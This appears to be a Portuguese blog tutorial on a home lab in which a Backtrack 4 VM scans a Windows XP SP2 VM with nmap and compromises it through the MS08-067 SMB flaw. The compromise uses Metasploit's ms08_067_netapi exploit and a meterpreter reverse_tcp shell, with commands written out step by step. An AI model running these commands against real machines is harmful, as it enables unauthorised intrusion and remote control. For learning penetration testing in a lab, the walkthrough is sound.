O cenário utilizado foi o seguinte:
Neste caso, são 2 máquinas virtuais (VMs) criadas usando o Virtualbox. As placas de rede de ambas VMs, estão configuradas como bridge.
1ª VM = Sistema Operacional Backtrack 4 Final com endereço IP 192.168.0.170.
2ª VM = Sistema Operacional Windows XP SP2 com endereço IP 192.168.0.186.
Quer saber mais sobre virtualbox? Digite "virtualbox" no google que encontrará ótimos artigos/dicas sobre o mesmo.
Scanning com Nmap e Metasploit
Ok pessoal, vamos utilizar a ferramenta "nmap" para fazer o scanning em nossa rede interna.
Abra um terminal no micro com o backtrack e digite a seguinte sintaxe:
# nmap -v -sS --script=smb-check-vulns 192.168.0.0/24
-v = Modo Verbose
-sS = TCP Syn Scan
--script=smb-check-vulns = Script para verificar vulns conhecidas, como por exemplo, MS08-067, Conficker, regsvc DoS e SMBv2 exploit.
192.168.0.0/24 = Range de IP utilizado em minha rede local.
Se repararem, no host com endereço IP 192.168.0.186, verá que é mostrado as portas que estão abertas, e em MS08-067 está como VULNERABLE, tendo essa "simples" base, vamos atacá-lo.
Certo, descobrimos um host dentro da nossa LAN que está possívelmente vulnerável ao nosso ataque pretendido!
Agora vamos carregar o Metasploit. No terminal, basta digitar msfconsole e...
Obtemos nosso console do msf. Dei uma personalizada na saída
Feito isto, vamos efetuar a intrusão na máquina.
Os comando são os seguintes:
use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
exploit <------ E finalmente executamos nosso exploit. Observem a imagem abaixo.
Pronto! Ganhamos nossa shell meterpreter, ou seja, já estamos na máquina alvo. Experimente dar os comandos sysinfo e ipconfig.
Ok! Vamos ver outros recursos que podemos utilizar antes de executarmos o exploit.
Opções Metasploit
Quando executamos o comando exploit, será realizado um "fingerprint" para a detecção do Sistema Operacional e verificar se o mesmo consta em sua lista de SOs vulneráveis.
Como vimos atráves do script do nmap que nosso alvo é vulnerável, podemos "nós" realizar o processo de fingerprint e passar as especificações corretas para o msf, assim nosso exploit não precisará realizar esta etapa, gerando possibilidades menores de erros.
Certo, mais como? Poderiamos fazer utilizando o nmap, mais vamos utilizar um módulo auxiliar presente no metasploit para descobrir a versão do SO, o idioma, nome da máquina e o domínio.
Executaremos os seguintes comandos:
use auxiliary/scanner/smb/smb_version <---- Falamos que queremos utilizar o scanner smb_version.
set RHOSTS 192.168.0.186 <---- Aqui eu setei um único host (192.168.0.186), mais poderia especificar um range, exemplo, 192.168.0.0/24.
run <---- Comando para executar nosso scanner.
Agora já sabemos a versão certa do SO e o idioma, com isso especificaremos em nosso exploit usando a opção set TARGET.
use exploit/windows/smb/ms08_067_netapi <------ Aqui falamos que queremos usar o exploit ms08_067_netapi
set RHOST 192.168.0.186 <------ Aqui setamos o nosso host remoto, que no caso é o endereço IP da VM com Windows XP SP2
set PAYLOAD windows/meterpreter/reverse_tcp <------ Aqui especificamos o payload que iremos utilizar, reverse_tcp, ele é o responsável por criar a nossa comunicação entre LHOST e RHOST.
set LHOST 192.168.0.170 <------ Aqui setamos nosso host local, que no caso é o endereço IP da VM com Backtrack 4.
set TARGET 31 <------ Aqui eu digo o que o alvo está usando.
exploit <------ E finalmente executamos nosso exploit. Na imagem abaixo, é listado com o comando show targets, todos os S.O.s vulneráveis a este exploit (ms08_067).
Veja abaixo que irei utilizar a opção 31.
Veja o ataque agora.
Veja que não foi realizado a etapa de fingerprint com o alvo, pois "falamos" para o exploit, o S.O. que ele encontrará em seu destino.
Ok! Finish! The end! Heheheh
Ah!
É isso galera, intrusão simples, sendo recomendado para quem ainda está começando com o Metasploit.
0 comentários:
Postar um comentário